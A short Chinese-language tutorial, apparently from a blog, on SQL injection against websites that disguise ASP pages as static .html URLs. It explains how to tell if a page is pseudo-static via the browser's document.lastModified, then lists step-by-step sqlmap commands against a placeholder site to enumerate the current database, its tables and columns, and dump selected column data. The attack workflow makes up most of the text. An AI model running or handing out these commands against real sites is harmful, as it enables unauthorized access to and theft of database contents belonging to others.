伪静态生成两种方式
框架伪静态
利用组件把asp后缀显示为html
SQL注入防御中,伪静态起到了一定作用,但不能完全依赖于伪静态就能达到防止SQL注入的目的,伪静态一样可以用联合查询,只是具体字段要一个一个猜
1.PNG
2.PNG
步骤
1.分析是否为伪静态
www.xxx.com/xxx.html
控制台:document.lastModified
按上下箭头 看时间是否改变 如果改变就是伪静态
2.--current-db
sqlmap.py -u www.xxx.com/xxx.html --current-db
在SQLmap中 哪里存在注入点就在哪里输入
3.-D "数据库名" --tables
sqlmap.py -u www.xxx.com/xxx*.html -D 数据库 --tables
4.-D "数据库名" -T "表名" --columns
sqlmap.py -u www.xxx.com/xxx*.html -D 数据库 -T 表名 --columns
5.-D "数据库名" -T "表名" -C "列名" --dump
sqlmap.py -u www.xxx.com/xxx*.html -D 数据库 -T 表名 -C 列1,列2 --dump
网友评论